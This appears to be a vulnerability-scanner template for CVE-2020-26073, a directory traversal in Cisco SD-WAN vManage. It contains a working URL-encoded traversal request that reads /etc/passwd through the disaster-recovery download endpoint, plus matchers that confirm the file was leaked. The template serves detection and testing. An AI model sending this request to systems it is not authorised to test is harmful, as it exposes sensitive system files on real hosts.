id: CVE-2020-26073 info: name: Cisco SD-WAN vManage Software Directory Traversal author: madrobot severity: high description: | A vulnerability in the application data endpoints of Cisco SD-WAN vManage Software could allow an unauthenticated, remote attacker to gain access to sensitive information. reference: - https://www.cisco.com/c/en/us/support/docs/csa/cisco-sa-vman-traversal-hQh24tmk.html classification: cve-id: CVE-2020-26073 tags: cve,cve2020,cisco,lfi requests: - method: GET path: - "{{BaseURL}}/dataservice/disasterrecovery/download/token/%2E%2E%2F%2E%2E%2F%2E%2E%2F%2Fetc%2Fpasswd" matchers-condition: and matchers: - type: status status: - 200 - type: regex regex: - "root:.*:0:0:" part: body